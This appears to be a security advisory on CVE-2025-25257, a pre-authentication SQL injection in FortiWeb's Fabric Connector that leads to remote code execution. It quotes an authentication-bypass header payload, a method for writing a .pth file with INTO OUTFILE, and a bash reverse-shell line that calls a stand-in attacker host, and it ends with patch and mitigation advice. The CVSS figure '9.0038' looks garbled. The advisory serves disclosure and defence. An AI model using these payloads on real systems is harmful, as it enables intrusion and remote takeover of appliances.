A severe pre-authentication SQL injection vulnerability in Fortinet FortiWeb’s Fabric Connector component allow unauthenticated attackers to perform remote code execution (RCE) on vulnerable appliances by exploiting improper input handling in a REST API endpoint. Public proof-of-concept (PoC) exploits have been released, significantly increasing the likelihood of exploitation in the wild.
Severity Level: Critical
Vulnerability Details
- CVE ID: CVE-2025-25257
- CWE: CWE-89 – Improper Neutralization of Special Elements Used in an SQL Command (‘SQL Injection’)
- CVSS Score: 9.0038
- Vulnerable Component: get_fabric_user_by_token() function in FortiWeb’s Fabric Connector
- Attack Vector: Remote / Unauthenticated
- Vulnerability Type: SQL Injection leading to Remote Code Execution (RCE)
- Exposed Endpoint: /api/fabric/device/status
Root Cause
The vulnerability stems from unsafe usage of user-supplied input in SQL queries, specifically the Authorization: Bearer header. The function get_fabric_user_by_token() constructs SQL statements using snprintf() without input sanitization or parameter binding:
snprintf(s, 0x400u, “select id from fabric_user.user_table where token=’%s'”, a1);
This enables attackers to inject arbitrary SQL payloads directly into the database query.
Exploitation Of The Vulnerability
Phase 1: SQL Injection via HTTP Header
Attackers send specially crafted HTTP requests to the /api/fabric/device/status endpoint:
- GET /api/fabric/device/status HTTP/1.1
- Authorization: Bearer AAAAAA’or’1’=’1
This bypasses authentication.
Phase 2: File Write via MySQL INTO OUTFILE
Using MySQL’s INTO OUTFILE, attackers write a malicious .pth file into Python’s site-packages directory. This file includes:
- import os; os.system(‘bash -c “/bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1″‘)
Phase 3: RCE Trigger
The .pth file is executed when Fortinet’s exposed CGI script (/cgi-bin/ml-draw.py) runs, leading to full remote code execution.
Constraints Overcome:
- Character limits in the Authorization header
- SQL parsing limitations via sscanf() (no spaces allowed → workaround via /**/ comments)
- MySQL restrictions on file writing (no overwrite/append → relative path + one-shot payload)
Affected & Fixed Versions
| Version | Affected | Solution |
| FortiWeb 7.6 | 7.6.0 through 7.6.3 | Upgrade to 7.6.4 or above |
| FortiWeb 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |
Recommendations
- Upgrade FortiWeb to the fixed versions.
- Workaround: Disable HTTP/HTTPS administrative interface.
- Alert on HTTP requests to /api/fabric/device/status with suspicious Authorization headers
- Disable unused Fabric Connector integrations if not essential
- Remove CGI execution permissions for /cgi-bin/* if not required
- Audit file permissions of directories such as /migadmin/cgi-bin and Python site-packages.
Source:
- https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/
- https://fortiguard.fortinet.com/psirt/FG-IR-25-151
- https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn
No related posts found.